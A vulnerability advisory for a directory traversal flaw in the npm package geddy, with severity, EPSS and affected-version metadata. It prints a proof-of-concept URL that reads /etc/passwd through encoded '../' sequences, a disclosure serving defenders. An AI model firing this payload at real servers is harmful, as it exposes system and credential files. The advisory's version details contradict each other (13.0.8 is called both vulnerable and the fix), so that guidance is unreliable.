Directory Traversal in geddy

Description

Versions 13.0.8 and earlier of geddy are vulnerable to a directory traversal attack via URI encoded attack vectors.

Proof of Concept

http://localhost:4000/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc/passwd

Recommendation

Update geddy to version >= 13.0.8

Basic information

Type
reviewed
Severity
high
Advisory on GitHub
Open advisory ↗
Repository advisory
Source code
Browse source ↗
Published (advisory)
2017-10-24 18:33:36 UTC
Updated
2023-01-09 05:02:38 UTC
GitHub reviewed
2020-06-16 20:53:48 UTC

EPSS Score

Score Percentile
81.09% 99.13%

CVSS Scores

No CVSS scores in this advisory.

Identifiers

CWEs

CWE id Name
CWE-22 Improper Limitation of a Pathname to a Restricted Directory ('Path Traversal')

Affected packages (1)

Vulnerable version ranges and first patched releases as published by GitHub.

Ecosystem Package Vulnerable range First patched Vulnerable functions
npm geddy < 13.0.8 13.0.8

References

cvelogic Threat Intelligence